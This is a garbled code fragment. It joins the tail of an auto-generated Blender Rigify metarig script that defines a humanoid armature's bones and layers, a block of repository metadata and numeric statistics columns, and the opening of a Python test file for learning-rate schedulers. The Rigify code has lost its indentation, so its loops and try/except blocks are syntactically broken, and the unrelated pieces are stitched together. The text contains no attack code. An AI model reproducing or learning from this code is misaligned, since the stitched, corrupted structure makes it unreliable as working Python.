arm.rigify_colors[5].normal = Color((0.9686275124549866, 0.250980406999588, 0.0941176563501358))
arm.rigify_colors[5].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[5].standard_colors_lock = True
for i in range(29):
arm.rigify_layers.add()
arm.rigify_layers[0].name = " "
arm.rigify_layers[0].row = 1
arm.rigify_layers[0].set = False
arm.rigify_layers[0].group = 0
arm.rigify_layers[1].name = " "
arm.rigify_layers[1].row = 1
arm.rigify_layers[1].set = False
arm.rigify_layers[1].group = 0
arm.rigify_layers[2].name = " "
arm.rigify_layers[2].row = 1
arm.rigify_layers[2].set = False
arm.rigify_layers[2].group = 0
arm.rigify_layers[3].name = "Torso"
arm.rigify_layers[3].row = 3
arm.rigify_layers[3].set = False
arm.rigify_layers[3].group = 3
arm.rigify_layers[4].name = "Torso (Tweak)"
arm.rigify_layers[4].row = 4
arm.rigify_layers[4].set = False
arm.rigify_layers[4].group = 4
arm.rigify_layers[5].name = " "
arm.rigify_layers[5].row = 1
arm.rigify_layers[5].set = False
arm.rigify_layers[5].group = 0
arm.rigify_layers[6].name = " "
arm.rigify_layers[6].row = 1
arm.rigify_layers[6].set = False
arm.rigify_layers[6].group = 0
arm.rigify_layers[7].name = "Arm.L (IK)"
arm.rigify_layers[7].row = 7
arm.rigify_layers[7].set = False
arm.rigify_layers[7].group = 2
arm.rigify_layers[8].name = "Arm.L (FK)"
arm.rigify_layers[8].row = 8
arm.rigify_layers[8].set = False
arm.rigify_layers[8].group = 5
arm.rigify_layers[9].name = "Arm.L (Tweak)"
arm.rigify_layers[9].row = 9
arm.rigify_layers[9].set = False
arm.rigify_layers[9].group = 4
arm.rigify_layers[10].name = "Arm.R (IK)"
arm.rigify_layers[10].row = 7
arm.rigify_layers[10].set = False
arm.rigify_layers[10].group = 2
arm.rigify_layers[11].name = "Arm.R (FK)"
arm.rigify_layers[11].row = 8
arm.rigify_layers[11].set = False
arm.rigify_layers[11].group = 5
arm.rigify_layers[12].name = "Arm.R (Tweak)"
arm.rigify_layers[12].row = 9
arm.rigify_layers[12].set = False
arm.rigify_layers[12].group = 4
arm.rigify_layers[13].name = "Leg.L (IK)"
arm.rigify_layers[13].row = 10
arm.rigify_layers[13].set = False
arm.rigify_layers[13].group = 2
arm.rigify_layers[14].name = "Leg.L (FK)"
arm.rigify_layers[14].row = 11
arm.rigify_layers[14].set = False
arm.rigify_layers[14].group = 5
arm.rigify_layers[15].name = "Leg.L (Tweak)"
arm.rigify_layers[15].row = 12
arm.rigify_layers[15].set = False
arm.rigify_layers[15].group = 4
arm.rigify_layers[16].name = "Leg.R (IK)"
arm.rigify_layers[16].row = 10
arm.rigify_layers[16].set = False
arm.rigify_layers[16].group = 2
arm.rigify_layers[17].name = "Leg.R (FK)"
arm.rigify_layers[17].row = 11
arm.rigify_layers[17].set = False
arm.rigify_layers[17].group = 5
arm.rigify_layers[18].name = "Leg.R (Tweak)"
arm.rigify_layers[18].row = 12
arm.rigify_layers[18].set = False
arm.rigify_layers[18].group = 4
arm.rigify_layers[19].name = ""
arm.rigify_layers[19].row = 1
arm.rigify_layers[19].set = False
arm.rigify_layers[19].group = 0
arm.rigify_layers[20].name = ""
arm.rigify_layers[20].row = 1
arm.rigify_layers[20].set = False
arm.rigify_layers[20].group = 0
arm.rigify_layers[21].name = ""
arm.rigify_layers[21].row = 1
arm.rigify_layers[21].set = False
arm.rigify_layers[21].group = 0
arm.rigify_layers[22].name = ""
arm.rigify_layers[22].row = 1
arm.rigify_layers[22].set = False
arm.rigify_layers[22].group = 0
arm.rigify_layers[23].name = ""
arm.rigify_layers[23].row = 1
arm.rigify_layers[23].set = False
arm.rigify_layers[23].group = 0
arm.rigify_layers[24].name = ""
arm.rigify_layers[24].row = 1
arm.rigify_layers[24].set = False
arm.rigify_layers[24].group = 0
arm.rigify_layers[25].name = ""
arm.rigify_layers[25].row = 1
arm.rigify_layers[25].set = False
arm.rigify_layers[25].group = 0
arm.rigify_layers[26].name = ""
arm.rigify_layers[26].row = 1
arm.rigify_layers[26].set = False
arm.rigify_layers[26].group = 0
arm.rigify_layers[27].name = ""
arm.rigify_layers[27].row = 1
arm.rigify_layers[27].set = False
arm.rigify_layers[27].group = 0
arm.rigify_layers[28].name = "Root"
arm.rigify_layers[28].row = 14
arm.rigify_layers[28].set = False
arm.rigify_layers[28].group = 1
bones = {}
bone = arm.edit_bones.new('spine')
bone.head[:] = 0.0000, 0.0552, 1.0099
bone.tail[:] = 0.0000, 0.0172, 1.1573
bone.roll = 0.0000
bone.use_connect = False
bones['spine'] = bone.name
bone = arm.edit_bones.new('spine.001')
bone.head[:] = 0.0000, 0.0172, 1.1573
bone.tail[:] = 0.0000, 0.0004, 1.2929
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine']]
bones['spine.001'] = bone.name
bone = arm.edit_bones.new('pelvis.L')
bone.head[:] = 0.0000, 0.0552, 1.0099
bone.tail[:] = 0.1112, -0.0451, 1.1533
bone.roll = -1.0756
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['pelvis.L'] = bone.name
bone = arm.edit_bones.new('pelvis.R')
bone.head[:] = -0.0000, 0.0552, 1.0099
bone.tail[:] = -0.1112, -0.0451, 1.1533
bone.roll = 1.0756
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['pelvis.R'] = bone.name
bone = arm.edit_bones.new('thigh.L')
bone.head[:] = 0.0980, 0.0124, 1.0720
bone.tail[:] = 0.0980, -0.0286, 0.5372
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['thigh.L'] = bone.name
bone = arm.edit_bones.new('thigh.R')
bone.head[:] = -0.0980, 0.0124, 1.0720
bone.tail[:] = -0.0980, -0.0286, 0.5372
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['thigh.R'] = bone.name
bone = arm.edit_bones.new('spine.002')
bone.head[:] = 0.0000, 0.0004, 1.2929
bone.tail[:] = 0.0000, 0.0059, 1.4657
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.001']]
bones['spine.002'] = bone.name
bone = arm.edit_bones.new('shin.L')
bone.head[:] = 0.0980, -0.0286, 0.5372
bone.tail[:] = 0.0980, 0.0162, 0.0852
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.L']]
bones['shin.L'] = bone.name
bone = arm.edit_bones.new('shin.R')
bone.head[:] = -0.0980, -0.0286, 0.5372
bone.tail[:] = -0.0980, 0.0162, 0.0852
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.R']]
bones['shin.R'] = bone.name
bone = arm.edit_bones.new('spine.003')
bone.head[:] = 0.0000, 0.0059, 1.4657
bone.tail[:] = 0.0000, 0.0114, 1.6582
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.002']]
bones['spine.003'] = bone.name
bone = arm.edit_bones.new('foot.L')
bone.head[:] = 0.0980, 0.0162, 0.0852
bone.tail[:] = 0.0980, -0.0934, 0.0167
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.L']]
bones['foot.L'] = bone.name
bone = arm.edit_bones.new('foot.R')
bone.head[:] = -0.0980, 0.0162, 0.0852
bone.tail[:] = -0.0980, -0.0934, 0.0167
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.R']]
bones['foot.R'] = bone.name
bone = arm.edit_bones.new('spine.004')
bone.head[:] = 0.0000, 0.0114, 1.6582
bone.tail[:] = 0.0000, -0.0130, 1.7197
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.003']]
bones['spine.004'] = bone.name
bone = arm.edit_bones.new('shoulder.L')
bone.head[:] = 0.0183, -0.0684, 1.6051
bone.tail[:] = 0.1694, 0.0205, 1.6050
bone.roll = 0.0004
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['shoulder.L'] = bone.name
bone = arm.edit_bones.new('shoulder.R')
bone.head[:] = -0.0183, -0.0684, 1.6051
bone.tail[:] = -0.1694, 0.0205, 1.6050
bone.roll = -0.0004
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['shoulder.R'] = bone.name
bone = arm.edit_bones.new('breast.L')
bone.head[:] = 0.1184, 0.0485, 1.4596
bone.tail[:] = 0.1184, -0.0907, 1.4596
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['breast.L'] = bone.name
bone = arm.edit_bones.new('breast.R')
bone.head[:] = -0.1184, 0.0485, 1.4596
bone.tail[:] = -0.1184, -0.0907, 1.4596
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['breast.R'] = bone.name
bone = arm.edit_bones.new('toe.L')
bone.head[:] = 0.0980, -0.0934, 0.0167
bone.tail[:] = 0.0980, -0.1606, 0.0167
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['foot.L']]
bones['toe.L'] = bone.name
bone = arm.edit_bones.new('heel.02.L')
bone.head[:] = 0.0600, 0.0459, 0.0000
bone.tail[:] = 0.1400, 0.0459, 0.0000
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['foot.L']]
bones['heel.02.L'] = bone.name
bone = arm.edit_bones.new('toe.R')
bone.head[:] = -0.0980, -0.0934, 0.0167
bone.tail[:] = -0.0980, -0.1606, 0.0167
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['foot.R']]
bones['toe.R'] = bone.name
bone = arm.edit_bones.new('heel.02.R')
bone.head[:] = -0.0600, 0.0459, 0.0000
bone.tail[:] = -0.1400, 0.0459, 0.0000
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['foot.R']]
bones['heel.02.R'] = bone.name
bone = arm.edit_bones.new('spine.005')
bone.head[:] = 0.0000, -0.0130, 1.7197
bone.tail[:] = 0.0000, -0.0247, 1.7813
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.004']]
bones['spine.005'] = bone.name
bone = arm.edit_bones.new('upper_arm.L')
bone.head[:] = 0.1953, 0.0267, 1.5846
bone.tail[:] = 0.4424, 0.0885, 1.4491
bone.roll = 2.0724
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.L']]
bones['upper_arm.L'] = bone.name
bone = arm.edit_bones.new('upper_arm.R')
bone.head[:] = -0.1953, 0.0267, 1.5846
bone.tail[:] = -0.4424, 0.0885, 1.4491
bone.roll = -2.0724
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.R']]
bones['upper_arm.R'] = bone.name
bone = arm.edit_bones.new('spine.006')
bone.head[:] = 0.0000, -0.0247, 1.7813
bone.tail[:] = 0.0000, -0.0247, 1.9796
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.005']]
bones['spine.006'] = bone.name
bone = arm.edit_bones.new('forearm.L')
bone.head[:] = 0.4424, 0.0885, 1.4491
bone.tail[:] = 0.6594, 0.0492, 1.3061
bone.roll = 2.1535
bone.use_connect = True
bone.parent = arm.edit_bones[bones['upper_arm.L']]
bones['forearm.L'] = bone.name
bone = arm.edit_bones.new('forearm.R')
bone.head[:] = -0.4424, 0.0885, 1.4491
bone.tail[:] = -0.6594, 0.0492, 1.3061
bone.roll = -2.1535
bone.use_connect = True
bone.parent = arm.edit_bones[bones['upper_arm.R']]
bones['forearm.R'] = bone.name
bone = arm.edit_bones.new('hand.L')
bone.head[:] = 0.6594, 0.0492, 1.3061
bone.tail[:] = 0.7234, 0.0412, 1.2585
bone.roll = 2.2103
bone.use_connect = True
bone.parent = arm.edit_bones[bones['forearm.L']]
bones['hand.L'] = bone.name
bone = arm.edit_bones.new('hand.R')
bone.head[:] = -0.6594, 0.0492, 1.3061
bone.tail[:] = -0.7234, 0.0412, 1.2585
bone.roll = -2.2103
bone.use_connect = True
bone.parent = arm.edit_bones[bones['forearm.R']]
bones['hand.R'] = bone.name
bpy.ops.object.mode_set(mode='OBJECT')
pbone = obj.pose.bones[bones['spine']]
pbone.rigify_type = 'spines.super_spine'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.neck_pos = 5
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['pelvis.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['pelvis.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "leg"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.limb_type = "leg"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shoulder.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['shoulder.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['breast.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['breast.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['toe.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['heel.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['toe.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['heel.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.005']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['upper_arm.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['upper_arm.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.006']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forearm.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forearm.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['hand.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['hand.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
bpy.ops.object.mode_set(mode='EDIT')
for bone in arm.edit_bones:
bone.select = False
bone.select_head = False
bone.select_tail = False
for b in bones:
bone = arm.edit_bones[bones[b]]
bone.select = True
bone.select_head = True
bone.select_tail = True
arm.edit_bones.active = bone
arm.layers = [(x in [3, 7, 10, 13, 16]) for x in range(32)]
# Generate the rig on the currently active object when this (auto-generated
# rigify metarig script) is run directly inside Blender.
if __name__ == "__main__":
    create(bpy.context.active_object)
| 49.802632
| 270
| 0.664641
| 4,964
| 34,065
| 4.456285
| 0.04311
| 0.576827
| 0.754713
| 0.858912
| 0.90778
| 0.814158
| 0.808101
| 0.786538
| 0.756476
| 0.740202
| 0
| 0.073222
| 0.184941
| 34,065
| 684
| 271
| 49.802632
| 0.723501
| 0.001145
| 0
| 0.481315
| 1
| 0
| 0.04529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001495
| false
| 0.023916
| 0.00299
| 0
| 0.004484
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2277be39f191bc8f598df136ae1c02cc560453b5
| 12,007
|
py
|
Python
|
tests/test_scheduler.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 209
|
2021-10-30T08:32:10.000Z
|
2022-03-31T16:18:03.000Z
|
tests/test_scheduler.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 12
|
2021-12-04T10:47:11.000Z
|
2022-03-31T15:39:40.000Z
|
tests/test_scheduler.py
|
apple/ml-cvnets
|
84d992f413e52c0468f86d23196efd9dad885e6f
|
[
"AML"
] | 50
|
2021-11-01T08:15:02.000Z
|
2022-03-29T08:17:34.000Z
|
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
import numpy as np
import random
from pprint import pprint
from tqdm import tqdm
from typing import Optional, Union, List
import sys
sys.path.append("..")
from options.opts import get_training_arguments
from optim.scheduler import build_scheduler
from utils import logger
# Maximum allowed |expected - observed| LR for iteration-based schedules.
LR_TOLERANCE = 1e-5
# Starting learning rates to sweep: 10 evenly spaced values in [0.001, 0.1].
MAX_LRS = np.linspace(0.001, 0.1, 10)
# Warmup settings to sweep; None presumably disables warmup — confirm in
# the scheduler implementation.
WARMUP_ITERATIONS = [None, 100, 1000, 10000]
# Synthetic dataset/batch sizes used to derive the number of batches per epoch.
BATCH_SIZE = 100
DATASET_SIZE = 20000
def run_test(
    scheduler, num_epochs: int, num_batches: int, return_all_lrs: Optional[bool] = False
) -> Union[List, float]:
    """Step *scheduler* through every iteration of a simulated training run.

    Args:
        scheduler: Object exposing ``get_lr(epoch, curr_iter=...)``.
        num_epochs: Number of epochs to simulate.
        num_batches: Number of batches (iterations) per epoch.
        return_all_lrs: When True, return the LR of every iteration;
            otherwise return only the final LR.

    Returns:
        A list of all per-iteration learning rates, or the last learning
        rate (0.0 when no iterations ran).
    """
    history = []
    step = 0
    for epoch in range(num_epochs):
        for _ in range(num_batches):
            history.append(scheduler.get_lr(epoch, curr_iter=step))
            step += 1
    if return_all_lrs:
        return history
    return history[-1] if history else 0.0
